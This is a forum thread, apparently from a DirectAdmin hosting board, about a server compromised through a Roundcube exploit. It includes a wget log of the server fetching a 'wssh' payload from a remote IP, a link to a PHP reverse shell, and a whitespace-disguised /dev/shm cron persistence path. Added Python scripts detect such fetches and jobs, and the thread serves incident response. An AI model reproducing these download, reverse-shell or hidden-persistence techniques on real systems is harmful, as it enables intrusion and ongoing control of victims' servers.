Just hacked with WSSH

FishStick

Hi there,

When I got into the office this morning apache was running but not responding. I had to kill it and start it. Then I looked through the error logs and found out that someone or something was trying to download wcube and wssh to my server, and had in fact downloaded wssh:

--05:18:00-- http://85.214.32.216/icons/wssh
=> `wssh'
Connecting to 85.214.32.216:80... wssh: no process killed
--05:18:00-- http://85.214.32.216/icons/wssh
=> `wssh'
Connecting to 85.214.32.216:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,569,280 [text/plain]

0K .......... .......... .......... .......... .......... 1% 659.52 KB/s
50K .......... .......... .......... .......... .......... 2% 2.57 MB/s
100K .......... .......... .......... .......... .......... 4% 2.44 MB/s
150K .......... .......... .......... .......... .......... 5% 2.96 MB/s
200K .......... .......... .......... .......... .......... 7% 2.96 MB/s
250K .......... .......... .......... .......... .......... 8% 4.44 MB/s
300K .......... .......... .......... .......... .......... 10% 4.66 MB/s
350K .......... .......... .......... .......... .......... 11% 2.87 MB/s
400K .......... .......... .......... .......... .......... 12% 4.65 MB/s
450K .......... .......... .......... .......... .......... 14% 4.67 MB/s
500K .......... .......... .......... .......... .......... 15% 2.44 MB/s
550K .......... .......... .......... .......... .......... 17% 5.43 MB/s
600K .......... .......... .......... .......... .......... 18% 2.96 MB/s
650K .......... .......... .......... .......... .......... 20% 3.37 MB/s
700K .......... .......... .......... .......... .......... 21% 2.96 MB/s
750K .......... .......... .......... .......... .......... 22% 5.15 MB/s
800K .......... .......... .......... .......... .......... 24% 4.25 MB/s
850K .......... .......... .......... .......... .......... 25% 2.96 MB/s
900K .......... .......... .......... .......... .......... 27% 3.62 MB/s
950K .......... .......... .......... .......... .......... 28% 2.64 MB/s
1000K .......... .......... .......... .......... .......... 30% 4.65 MB/s
1050K .......... .......... .......... .......... .......... 31% 2.88 MB/s
1100K .......... .......... .......... .......... .......... 32% 4.88 MB/s
1150K .......... .......... .......... .......... .......... 34% 3.61 MB/s
1200K .......... .......... .......... .......... .......... 35% 2.88 MB/s
1250K .......... .......... .......... .......... .......... 37% 4.65 MB/s
1300K .......... .......... .......... .......... .......... 38% 3.05 MB/s
1350K .......... .......... .......... .......... .......... 40% 3.76 MB/s
1400K .......... .......... .......... .......... .......... 41% 4.89 MB/s
1450K .......... .......... .......... .......... .......... 43% 3.05 MB/s
1500K .......... .......... .......... .......... .......... 44% 2.88 MB/s
1550K .......... .......... .......... .......... .......... 45% 2.96 MB/s
1600K .......... .......... .......... .......... .......... 47% 5.74 MB/s
1650K .......... .......... .......... .......... .......... 48% 2.96 MB/s
1700K .......... .......... .......... .......... .......... 50% 3.06 MB/s
1750K .......... .......... .......... .......... .......... 51% 9.78 MB/s
1800K .......... .......... .......... .......... .......... 53% 2.27 MB/s
1850K .......... .......... .......... .......... .......... 54% 2.51 MB/s
1900K .......... .......... .......... .......... .......... 55% 2.96 MB/s
1950K .......... .......... .......... .......... .......... 57% 9.77 MB/s
2000K .......... .......... .......... .......... .......... 58% 2.57 MB/s
2050K .......... .......... .......... .......... .......... 60% 3.49 MB/s
2100K .......... .......... .......... .......... .......... 61% 3.05 MB/s
2150K .......... .......... .......... .......... .......... 63% 6.50 MB/s
2200K .......... .......... .......... .......... .......... 64% 3.06 MB/s
2250K .......... .......... .......... .......... .......... 65% 2.96 MB/s
2300K .......... .......... .......... .......... .......... 67% 8.17 MB/s
2350K .......... .......... .......... .......... .......... 68% 2.87 MB/s
2400K .......... .......... .......... .......... .......... 70% 2.87 MB/s
2450K .......... .......... .......... .......... .......... 71% 4.66 MB/s
2500K .......... .......... .......... .......... .......... 73% 2.87 MB/s
2550K .......... .......... .......... .......... .......... 74% 2.96 MB/s
2600K .......... .......... .......... .......... .......... 76% 2.27 MB/s
2650K .......... .......... .......... .......... .......... 77% 9.76 MB/s
2700K .......... .......... .......... .......... .......... 78% 3.15 MB/s
2750K .......... .......... .......... .......... .......... 80% 2.51 MB/s
2800K .......... .......... .......... .......... .......... 81% 9.87 MB/s
2850K .......... .......... .......... .......... .......... 83% 2.50 MB/s
2900K .......... .......... .......... .......... .......... 84% 2.88 MB/s
2950K .......... .......... .......... .......... .......... 86% 10.87 MB/s
3000K .......... .......... .......... .......... .......... 87% 2.96 MB/s
3050K .......... .......... .......... .......... .......... 88% 2.79 MB/s
3100K .......... .......... .......... .......... .......... 90% 2.51 MB/s
3150K .......... .......... .......... .......... .......... 91% 8.12 MB/s
3200K .......... .......... .......... .......... .......... 93% 2.33 MB/s
3250K .......... .......... .......... .......... .......... 94% 3.36 MB/s
3300K .......... .......... .......... .......... .......... 96% 6.99 MB/s
3350K .......... .......... .......... .......... .......... 97% 1.99 MB/s
3400K .......... .......... .......... .......... .......... 98% 3.91 MB/s
3450K .......... .......... .......... ..... 100% 3.33 MB/s

05:18:40 (3.22 MB/s) - `wssh' saved [3569280/3569280]

I found wssh in /tmp and deleted it.

Now, I've been googling about wssh, and read up here. From what I understand there have been several critical sploits in Roundcube since its dawn. Is the default DA still installed with known insecure apps and utils out of the box?

What damage can wssh do, what is its intention?

Thanks.

Edit: Just found cback and back.txt in /tmp too so the intruder was running his own shell on my server.

Edit 2: Anything else I must do (I can't run the server in PHP safe mode as I have some PHP scripts running different apps at the server)? So far I've:

1. Deleted wssh in /tmp
2. Deleted wcube in /tmp
3. Temporarily renamed/moved the PHP shell script (back.txt) to another path (as I'm going to block the source IP/attacker's IP stored in the file). Script will be deleted later.
4. Chmodded wget to 700
5. About to secure /tmp
6. Sent abuse mail to intruder's ISP
7. Yeah and of course deleted roundcube
 
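The wget banner lines in error_log are what gave this away: a web-app process ran wget, and wget's stderr landed in Apache's error log. As an added example (not code from the post, from DirectAdmin or from any tool mentioned), here is a small Python parser that pulls such fetches out of an error_log, pairs each `--time-- url` start with its `=> \`file'` destination and the matching `saved [n/n]` line, and flags completed downloads and fetches from IP-literal hosts. The sample log is constructed around the lines quoted in the post; the IP-literal rule is a heuristic, not something the post states.

```python
import re
from urllib.parse import urlparse

# Constructed sample of an Apache error_log.  The wget lines (URL, IP, byte
# counts) are the ones the post above shows; the first and last lines are
# constructed filler so the parser has ordinary entries to step over.
SAMPLE_ERROR_LOG = """\
[Sat Feb 14 05:17:58 2009] [notice] Apache/2.2 (Unix) configured -- resuming normal operations
--05:18:00-- http://85.214.32.216/icons/wssh
=> `wssh'
Connecting to 85.214.32.216:80... wssh: no process killed
--05:18:00-- http://85.214.32.216/icons/wssh
=> `wssh'
Connecting to 85.214.32.216:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,569,280 [text/plain]
0K .......... .......... .......... .......... .......... 1% 659.52 KB/s
3450K .......... .......... .......... ..... 100% 3.33 MB/s
05:18:40 (3.22 MB/s) - `wssh' saved [3569280/3569280]
[Sat Feb 14 05:19:02 2009] [error] [client 203.0.113.7] File does not exist: /var/www/html/favicon.ico
"""

# wget 1.x banner lines, in the form the post shows.
FETCH_RE = re.compile(r"^--(\d{2}:\d{2}:\d{2})--\s+(\S+)\s*$")
DEST_RE = re.compile(r"^=>\s+`(.+)'\s*$")
SAVED_RE = re.compile(r"^(\d{2}:\d{2}:\d{2}) \([^)]*\) - `(.+)' saved \[(\d+)/(\d+)\]")


def find_wget_fetches(log_text):
    """Return one dict per wget fetch attempt, in log order.

    Keys: time, url, host, dest, saved (bool), size (bytes written or None).
    A 'saved' line is attached to the most recent unfinished fetch whose
    destination file name matches; progress-bar lines are ignored."""
    fetches = []
    for line in log_text.splitlines():
        m = FETCH_RE.match(line)
        if m:
            time, url = m.groups()
            fetches.append({"time": time, "url": url, "host": urlparse(url).hostname,
                            "dest": None, "saved": False, "size": None})
            continue
        m = DEST_RE.match(line)
        if m and fetches:
            fetches[-1]["dest"] = m.group(1)
            continue
        m = SAVED_RE.match(line)
        if m:
            _, dest, got, _total = m.groups()
            for f in reversed(fetches):
                if f["dest"] == dest and not f["saved"]:
                    f["saved"] = True
                    f["size"] = int(got)
                    break
    return fetches


def ip_literal_host(host):
    """Heuristic (an assumption of this example): a fetch whose host is a bare
    IPv4 address is worth a look, since legitimate mirrors normally use names."""
    return bool(host) and re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host) is not None


def suspicious_fetches(log_text):
    """Fetches an analyst should see: anything that completed, or any attempt
    against an IP-literal host."""
    return [f for f in find_wget_fetches(log_text)
            if f["saved"] or ip_literal_host(f["host"])]


if __name__ == "__main__":
    for f in suspicious_fetches(SAMPLE_ERROR_LOG):
        print(f"{f['time']} {f['url']} -> {f['dest']} saved={f['saved']} bytes={f['size']}")
```

Run it against a real error_log by reading the file into `find_wget_fetches`; on the sample it reports both attempts against 85.214.32.216, the second one completed with 3569280 bytes written to `wssh`.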
Yes we all know how to do a ripe search. But against what ip address? That is what I am asking. How did you figure out the attacker's ip address?

--05:18:00-- http://85.214.32.216/icons/wssh
=> `wssh'
Connecting to 85.214.32.216:80... wssh: no process killed
--05:18:00-- http://85.214.32.216/icons/wssh
=> `wssh'

This is the IP of where wssh was downloaded from NOT the attacker. It's good to notify the host too which apparently you did.

So again how did you figure out the attacker's isp?
 
This is the IP of where wssh was downloaded from NOT the attacker. It's good to notify the host too which apparently you did.

So again how did you figure out the attacker's isp?
I'm completely aware that's not the intruder's IP (...) so I didn't waste my time making any reports to that host. Even though that server clearly is compromised, it's passive in my logs. Actually my server is the active one connecting to his, so if anyone should get the abuse report in that isolated case it would be me or my ISP.

The intruder's IP is at line 49 in the PHP shell script.
 
I just reread your post. Probably after you edited it and see it now.

Apparently back.txt is for this specific attack. I was looking for a more general answer to help investigate all such attacks.
 
In my case, and many others I've come across, the recently discovered roundcube exploit has been used to upload (download actually) a PHP based reverse shell.

The script is stored in /tmp along with wcube and/or wssh, in my case both. I've seen different file names on this reverse shell script, though it appears to be the same: http://pentestmonkey.net/tools/php-reverse-shell/

It creates a backdoor at the server to the intruder, which in my case turned out to be a rooted ns at keyweb.de.
 
Ditto....

In the php reverse shell script, you can find the IP address and port of the IRC server that it was trying to connect to. I've also got the 'wssh' file in my /tmp as well.

Would mod_security have stopped the remote download? I've gone ahead and installed it too.
 
Is secure_php a script that comes with DA, if not where can I find more info on it? Does mod_security accomplish the same thing as 'secure_php'?
 
Painless, thanks.

BTW, also found some irc bot config info, or something to do with its configuration and/or C&C hidden in

Code:
/dev/shm/.              /.-/.              /.-/.ICE-unix/

And a cron job running with apache being its owner:

Code:
/USR/SBIN/CRON[4597]: (apache) CMD (/dev/shm/.              /.-/.              /.-/.ICE-unix/update >/dev/null 2>&1)

'apache' is listed in cron.deny, shouldn't that have been enough to prevent cron from running a cronjob owned by apache?
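On the cron.deny question: cron.allow and cron.deny are consulted by the crontab(1) command when a user installs or edits a crontab; the cron daemon does not re-check them when it runs entries already sitting in the spool, so a job that got in keeps firing until the spool file itself is removed. As an added example (not code from the post, from DirectAdmin or from any tool mentioned), here is a Python checker that parses syslog CRON lines and flags jobs owned by web-server accounts, commands living under /tmp, /var/tmp or /dev/shm, and the whitespace-padded dot names used to hide the /dev/shm directory shown above; a second function walks those scratch areas on a live host for the same disguised names. The syslog excerpt is constructed around the CRON line from the post; the account list and scratch-directory list are assumptions to adjust per host.

```python
import os
import re

# Constructed syslog excerpt.  The middle CRON line (PID 4597, user apache)
# is the one quoted in the post; the other two are constructed, ordinary jobs.
SAMPLE_SYSLOG = """\
Feb 14 05:20:01 web1 /USR/SBIN/CRON[4590]: (root) CMD (/usr/lib/sa/sa1 1 1)
Feb 14 05:25:01 web1 /USR/SBIN/CRON[4597]: (apache) CMD (/dev/shm/.              /.-/.              /.-/.ICE-unix/update >/dev/null 2>&1)
Feb 14 05:30:01 web1 /USR/SBIN/CRON[4612]: (backup) CMD (/usr/local/bin/nightly-dump.sh)
"""

CRON_RE = re.compile(r"CRON\[(\d+)\]: \((\S+)\) CMD \((.*)\)\s*$", re.IGNORECASE)

# Assumption: accounts that run the web server and should never own cron jobs.
NO_CRON_USERS = {"apache", "www-data", "httpd", "nobody"}
# Assumption: world-writable scratch areas an unprivileged attacker can drop files in.
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def odd_path_component(name):
    """Names chosen to hide from a casual `ls`: nothing but dots, dashes and
    whitespace, or a dot-prefixed (hidden) name that contains whitespace."""
    if not name:
        return False
    if re.fullmatch(r"[.\-\s]+", name):
        return True
    return name.startswith(".") and any(c.isspace() for c in name)


def parse_cron_lines(text):
    """Extract (pid, user, command) from syslog CRON entries."""
    jobs = []
    for line in text.splitlines():
        m = CRON_RE.search(line)
        if m:
            pid, user, cmd = m.groups()
            jobs.append({"pid": int(pid), "user": user, "cmd": cmd})
    return jobs


def job_findings(job):
    """Reasons this job deserves attention; an empty list means nothing odd."""
    reasons = []
    if job["user"] in NO_CRON_USERS:
        reasons.append("owned by web-server account " + job["user"])
    # The program path may itself contain spaces (that is the trick), so cut
    # only at the first shell redirect rather than at whitespace.
    prog = job["cmd"].split(">", 1)[0].strip()
    if prog.startswith(tuple(d + "/" for d in SCRATCH_DIRS)):
        reasons.append("command lives in a world-writable scratch area")
    odd = [p for p in prog.split("/") if odd_path_component(p)]
    if odd:
        reasons.append("path has %d disguised component(s), e.g. %r" % (len(odd), odd[0]))
    return reasons


def suspicious_cron_jobs(text):
    """(job, reasons) for every parsed job that has at least one finding."""
    out = []
    for job in parse_cron_lines(text):
        reasons = job_findings(job)
        if reasons:
            out.append((job, reasons))
    return out


def scan_scratch_dirs(roots=SCRATCH_DIRS):
    """Walk the scratch areas on a live host and return paths whose name is
    disguised the same way; unreadable directories are skipped by os.walk."""
    hits = []
    for root in roots:
        for dirpath, dirnames, filenames in os.walk(root):
            for name in dirnames + filenames:
                if odd_path_component(name):
                    hits.append(os.path.join(dirpath, name))
    return hits


if __name__ == "__main__":
    for job, reasons in suspicious_cron_jobs(SAMPLE_SYSLOG):
        print("PID %d user %s: %s" % (job["pid"], job["user"], "; ".join(reasons)))
    for path in scan_scratch_dirs():
        print("disguised name on disk:", path)
```

On the sample, only PID 4597 is reported, with all three findings; the root job's `sa1 1 1` arguments are not mistaken for a disguised name because the whitespace check applies only to dot-prefixed components.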
 